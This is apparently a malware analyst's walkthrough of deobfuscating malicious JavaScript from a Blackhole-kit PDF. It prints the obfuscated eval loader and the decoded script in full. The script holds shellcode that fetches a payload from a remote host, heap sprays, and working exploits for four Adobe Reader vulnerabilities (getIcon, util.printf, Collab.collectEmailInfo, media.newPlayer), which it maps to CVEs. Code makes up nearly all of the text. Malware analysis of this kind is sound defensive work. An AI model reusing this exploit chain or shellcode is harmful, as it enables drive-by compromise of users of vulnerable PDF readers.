s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3q3b3c3f3819353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1c1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e41393c3f3f353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1e3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1c3m3j3l343s1t1h3r1l1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1h3r1l1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h193n2n2f3b2g35293q1'+parseInt(app.beep(0)).toString().substring(1,2)+'4141342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191'+parseInt(app.beep(0)).toString().substring(1,2)+'1f363b343l233n191h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c3919342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113f3p1u342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+parseInt(app.beep(0)).toString().substring(1,2)+'404019193m3p1u1u1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1u1p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c39193f3p1u1u1o1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c391919193m3p1u1u1n1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193m3p1u1u1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1o1f1i1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c3919193f3p201u1q1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1q1f1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p201u1p1f1i1k1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1p1f1i1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u393o3h363n3c3i3h1134191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'413p343l113b1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193c1t1p1f1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u361u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11381u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1u1h3r1p1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u362t39301u371c384134191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s34191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+parseInt(app.beep(0)).toString().substring(1,2)+'4136343n363b19381'+parseInt(app.beep(0)).toString().substring(1,2)+'3u4134191'+parseInt(app.beep(0)).toString().substring(1,2)+'4141';
  80.  s='';
  81.  for(i=0;i<a.length;i+=2)
  82.  {
  83.    var jj = 0;
  84.    try
  85.    {
  86.      loadXML(
  87.      {
  88.      }
  89.      );
  90.    }
  91.    catch(e)
  92.    {
  93.      jj=1
  94.    }
  95.    if (jj==1) s+=String.fromCharCode(parseInt(a[i]+a[i+1],31));
  96.  }
  97.  e=this;
  98.  ev=/**/'eva'/**/;
  99.  l='l';
  100.  e=e[/*cas*/ev/*qwvq*/+l/*ebtt*/];
  101.  e(s);
  102.  
  103. //------------------------------------------------------------
  104. //
  105.  
  106. =============================================
  107.  
  108. HOW TO READ THESE OBFUSCATION CODE?
  109.  
  110. =============================================
  111.  
  112. // Let's see the pattern of obfuscation we will know there's a code between this code
  113. // The longer one like below indicated a obfuscation shellcode part
  114.  
  115.  a='353d3m3'+parseInt(app..
  116. 163o1l1h1p35163o1p351k1h1 ..
  117. 1m3838163o39391i1h163o351..
  118. 163o1p351m1n163o1k361o1m1..
  119. 351k1k163o35381h39163o1k1..
  120. 163o1n1n3737163o1h361p351..
  121. 35361k163o34371m1k163o1n1..
  122. 163o39393939163o381j39391..
  123. 351m1m163o1p353836163o1i1..
  124. 163o1p351h1p163o381p381p1..
  125. 1j1j1l163o1n1o1n1m163o361..
  126. 163o39391h1h163o1h361m1n1..
  127. 1n1n36163o1i371l1l163o1h1..
  128. 163o1i1l1m1n163o361h1p1m1..
  129. 1j3835163o1i1k3835163o1p1..
  130. 163o39393939163o1l381p381..
  131. 1h1j39163o1o1l1n1p163o1o1..
  132. 163o1j391k1h163o1n391n1n1..
  133. 1k1k39163o1n371o1q163o1o1..
  134. 163o1o1q1n1q163o1n1n1n351..
  135. 341n35163o1k1i1k1k163o1k1..
  136. 163o1o1h1n1n163o1n371o1l1..
  137.  
  138. // There is a repeatable pattern beloe is showing a brute strings for vulnarability,
  139. // we can assume this as exploit obfuscation part
  140.  
  141. 1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
  142. 1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
  143. 1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
  144. 1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
  145.  
  146.  
  147.  
  148. =================================
  149.  
  150. SOME ADJUSTMENT FOR DECODING
  151.  
  152. =================================
  153.  
  154. // In the last part you see the below pathetic code,
  155. // just replace these with eval(s); or document.write(s);
  156. // to burp the value holds in s <--- the deobfuscated script
  157.  
  158. // e=this;
  159. // ev=/**/'eva'/**/;
  160. // l='l';
  161. // e=e[/*cas*/ev/*qwvq*/+l/*ebtt*/];
  162. // e(s);
  163.  
  164. eval(s);
  165.  
  166.  
  167. // As per explained in my writing before at: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
  168. // thereis repitition of code: "parseInt(app.beep(0)).toString().substring(1,2)"
  169. // like a='353d3m3'+parseInt(app.beep(0)).toString().substring(1,2) +....'blah'+parseInt(app.beep(0)).toString().substring(1,2)
  170. // "(app.beep(0)).toString().substring(1,2)" < -- this value is very predictable, and returning a digit number,
  171. // so rephrase the logic with the value of one number and brute it..
  172. // i.e:
  173. //parseInt(app.beep(0)).toString().substring(1,2) ⇒parseInt('0');
  174. //                   :                               parseInt('1');
  175. //                   :                               parseInt('2');
  176. //                   :                               parseInt('3');
  177. //                   :                               parseInt('4');
  178. //                   :                               parseInt('5');
  179. //                   :                               parseInt('6');
  180. //                   :                               parseInt('7');
  181. //                   :                               parseInt('8');
  182. //                   :                               parseInt('9');
  183.  
  184.  
  185. ==================================
  186.  
  187. DECODED SCRIPTS AS FOLLOWS
  188.  
  189. =================================
  190.  
  191. // Just run the script and the "s" value s will burp you the result
  192. //Then you'll get the code below...
  193.  
  194. bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u642f%u6c65%u6d65%u6169%u6f74%u2e72%u7572%u383a%u3830%u2f30%u6f66%u7572%u2f6d%u696c%u6b6e%u2f73%u6f63%u756c%u6e6d%u702e%u7068%u633f%u6d79%u7577%u333d%u3a30%u6e3%u313a%u3a69%u6931%u333a%u2633%u6974%u706b%u7969%u666b%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31%u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u6f6b%u3d75%u6831%u6826%u6579%u6f64%u3d61%u7066%u6d74%u266c%u6968%u6463%u3d6b%u6d68%u6e79%u616b%u776a%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra}ra=ra.substring(0,qy/2);return ra}function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload}var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow}this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow})}function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock}fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock}mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock}var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888;util.printf("%45000f",num)}function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload}var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw}tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw)}}aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version}}if((lv==9)||((sv==8)&&(lv<=8.12))){geticon()}else if(lv==7.1){printf()}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx()}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date())}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version}}if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e}a();a();try{this.media.newPlayer(null)}catch(e){}a()}}
  195.  
  196. //
  197. //let's make it beautiful like below:
  198.  
  199.  bjsg = '%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u642f%u6c65%u6d65%u6169%u6f74%u2e72%u7572%u383a%u3830%u2f30%u6f66%u7572%u2f6d%u696c%u6b6e%u2f73%u6f63%u756c%u6e6d%u702e%u7068%u633f%u6d79%u7577%u333d%u3a30%u6e3%u313a%u3a69%u6931%u333a%u2633%u6974%u706b%u7969%u666b%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31%u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u6f6b%u3d75%u6831%u6826%u6579%u6f64%u3d61%u7066%u6d74%u266c%u6968%u6463%u3d6b%u6d68%u6e79%u616b%u776a%u0000';
  200.  function ezvr(ra, qy)
  201.  {
  202.    while (ra.length * 2 < qy)
  203.    {
  204.      ra += ra
  205.    }
  206.    ra = ra.substring(0, qy / 2);
  207.    return ra
  208.  }
  209.  function bx()
  210.  {
  211.    var dkg = new Array();
  212.    var vw = 0x0c0c0c0c;
  213.    var addr = 0x400000;
  214.    var payload = unescape(bjsg);
  215.    var sc_len = payload.length * 2;
  216.    var qy = addr - (sc_len + 0x38);
  217.    var yarsp = unescape("%u9090%u9090");
  218.    yarsp = ezvr(yarsp, qy);
  219.    var count2 = (vw - 0x400000) / addr;
  220.    for (var count = 0; count < count2; count ++ )
  221.    {
  222.      dkg[count] = yarsp + payload
  223.    }
  224.    var overflow = unescape("%u0c0c%u0c0c");
  225.    while (overflow.length < 44952)
  226.    {
  227.      overflow += overflow
  228.    }
  229.    this .collabStore = Collab.collectEmailInfo(
  230.    {
  231.      subj : "", msg : overflow
  232.    }
  233.    )
  234.  }
  235.  function printf()
  236.  {
  237.    nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  238.    var payload = unescape(bjsg);
  239.    heapblock = nop + payload;
  240.    bigblock = unescape("%u0A0A%u0A0A");
  241.    headersize = 20;
  242.    spray = headersize + heapblock.length;
  243.    while (bigblock.length < spray)
  244.    {
  245.      bigblock += bigblock
  246.    }
  247.    fillblock = bigblock.substring(0, spray);
  248.    block = bigblock.substring(0, bigblock.length - spray);
  249.    while (block.length + spray < 0x40000)
  250.    {
  251.      block = block + block + fillblock
  252.    }
  253.    mem = new Array();
  254.    for (i = 0; i < 1400; i ++ )
  255.    {
  256.      mem[i] = block + heapblock
  257.    }
  258.    var num =
  259.    129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  260.    888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  261.    888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  262.    88888888888888888888888888;
  263.    util.printf("%45000f", num)
  264.  }
  265.  function geticon()
  266.  {
  267.    var arry = new Array();
  268.    if (app.doc.Collab.getIcon)
  269.    {
  270.      var payload = unescape(bjsg);
  271.      var hWq500CN = payload.length * 2;
  272.      var qy = 0x400000 - (hWq500CN + 0x38);
  273.      var yarsp = unescape("%u9090%u9090");
  274.      yarsp = ezvr(yarsp, qy);
  275.      var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  276.      for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ )
  277.      {
  278.        arry[vqcQD96y] = yarsp + payload
  279.      }
  280.      var tUMhNbGw = unescape("%09");
  281.      while (tUMhNbGw.length < 0x4000)
  282.      {
  283.        tUMhNbGw += tUMhNbGw
  284.      }
  285.      tUMhNbGw = "N." + tUMhNbGw;
  286.      app.doc.Collab.getIcon(tUMhNbGw)
  287.    }
  288.  }
  289.  aPlugins = app.plugIns;
  290.  var sv = parseInt(app.viewerVersion.toString().charAt(0));
  291.  for (var i = 0; i < aPlugins.length; i ++ )
  292.  {
  293.    if (aPlugins[i].name == 'EScript')
  294.    {
  295.      var lv = aPlugins[i].version
  296.    }
  297.  }
  298.  if ((lv == 9) || ((sv == 8) && (lv <= 8.12)))
  299.  {
  300.    geticon()
  301.  }
  302.  else if (lv == 7.1)
  303.  {
  304.    printf()
  305.  }
  306.  else if (((sv == 6) || (sv == 7)) && (lv < 7.11))
  307.  {
  308.    bx()
  309.  }
  310.  else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
  311.  {
  312.    function a()
  313.    {
  314.      util.printd('p@111111111111111111111111 : yyyy111', new Date())
  315.    }
  316.    var h = app.plugIns;
  317.    for (var f = 0; f < h.length; f ++ )
  318.    {
  319.      if (h[f].name == 'EScript')
  320.      {
  321.        var i = h[f].version
  322.      }
  323.    }
  324.    if ((i > 8.12) && (i < 8.2))
  325.    {
  326.      c = new Array();
  327.      var d = unescape('%u9090%u9090');
  328.      var e = unescape(bjsg);
  329.      while (d.length <= 0x8000)
  330.      {
  331.        d += d
  332.      }
  333.      d = d.substr(0, 0x8000 - e.length);
  334.      for (f = 0; f < 2900; f ++ )
  335.      {
  336.        c[f] = d + e
  337.      }
  338.      a();
  339.      a();
  340.      try
  341.      {
  342.        this .media.newPlayer(null)
  343.      }
  344.      catch (e)
  345.      {
  346.      }
  347.      a()
  348.    }
  349.  }
  350.  
  351.  
  352. ========================================
  353.  
  354. THERE ARE 4 (FOUR) EXPLOITS CONTAINED IN THIS PDF:
  355.  
  356. 1. Adobe Plugin ver 9 or ver==8 or before 8.12  ====> CVE-2009-0927
  357. 2. Adobe Plugin ver 7.1  ====> CVE-2008-2992
  358. 3. Adobe ver  6 or ver 7 before ver < 7.11  ===> CVE-2007-5659
  359. 4. Adobe ver >= 9.1 or ver <= 9.2 or ver >= 8.13 or ver <= 8.17 ===> CVE-2009-4324
  360.  
  361. ========================================
  362.  
  363.  
  364. //There is the Exploit Code of CVE-2009-0927 below;...
  365. // to be applied in the Adobe ver below
  366. // lv == 9 || ((sv == 8) && (lv <= 8.12)
  367. // Vuln Name: Adobe Acrobat getIcon() Stack Overflow Vulnerability
  368.  
  369.  function geticon()
  370.  {
  371.    var arry = new Array();
  372.    if (app.doc.Collab.getIcon)
  373.    {
  374.      var payload = unescape(bjsg);
  375.      var hWq500CN = payload.length * 2;
  376.      var qy = 0x400000 - (hWq500CN + 0x38);
  377.      var yarsp = unescape("%u9090%u9090");
  378.      yarsp = ezvr(yarsp, qy);
  379.      var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  380.      for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ )
  381.      {
  382.        arry[vqcQD96y] = yarsp + payload
  383.      }
  384.      var tUMhNbGw = unescape("%09");
  385.      while (tUMhNbGw.length < 0x4000)
  386.      {
  387.        tUMhNbGw += tUMhNbGw
  388.      }
  389.      tUMhNbGw = "N." + tUMhNbGw;
  390.      app.doc.Collab.getIcon(tUMhNbGw)
  391.    }
  392.  
  393. // There is also Exploit Code of CVE-2008-2992
  394. // To be applied for Adobe version :
  395. // (lv == 7.1)
  396. // Vuln Name: Injection of Character 0A0A || "\u0A0A\u0A0A"|| %u0A0A%u0A0A%u0A0A%u0A0A
  397.  
  398.  function printf()
  399.  {
  400.    nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  401.    var payload = unescape(bjsg);
  402.    heapblock = nop + payload;
  403.    bigblock = unescape("%u0A0A%u0A0A");
  404.    headersize = 20;
  405.    spray = headersize + heapblock.length;
  406.    while (bigblock.length < spray)
  407.    {
  408.      bigblock += bigblock
  409.    }
  410.    fillblock = bigblock.substring(0, spray);
  411.    block = bigblock.substring(0, bigblock.length - spray);
  412.    while (block.length + spray < 0x40000)
  413.    {
  414.      block = block + block + fillblock
  415.    }
  416.    mem = new Array();
  417.    for (i = 0; i < 1400; i ++ )
  418.    {
  419.      mem[i] = block + heapblock
  420.    }
  421.    var num =
  422.    129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  423.    888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  424.    888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  425.    88888888888888888888888888;
  426.    util.printf("%45000f", num)
  427.  }
  428.  
  429.  
  430. // As for the Adobe version below:
  431. // (((sv == 6) || (sv == 7)) && (lv < 7.11))
  432. // To be aplied Exploit CVE-2007-5659
  433. // Vuln Name: Adobe Acrobat Collab.collectEmailInfo Buffer Overflow
  434.  
  435.  function bx()
  436.  {
